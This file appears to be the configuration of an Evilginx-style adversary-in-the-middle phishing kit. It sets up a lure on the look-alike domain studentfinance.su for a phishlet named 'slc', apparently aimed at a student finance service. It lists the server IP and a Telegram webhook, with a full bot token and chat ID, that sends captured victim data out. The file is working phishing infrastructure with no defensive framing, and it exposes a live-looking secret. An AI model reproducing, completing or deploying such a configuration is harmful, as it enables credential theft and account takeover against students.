adminpage_path: 7041085
blacklist_mode: "off"
ip: 185.196.10.64
lures:
    - hostname: ""
      path: /gKadubpF
      redirect_url: ""
      phishlet: slc
      template: ""
      ua_filter: ""
      info: ""
      og_title: ""
      og_desc: ""
      og_image: ""
      og_url: ""
proxy_enabled: false
redirect_key: ac
server: studentfinance.su
site_domains:
    ie: ""
    slc: studentfinance.su
sites_enabled:
    - slc
verification_key: la
verification_token: 8ec0
webhook_telegram: 7550649973:AAGXEuffUb7KRO5pSdQfmY4x6R0xN1oIkRg/-1002311846792
webhook_verbosity: 2
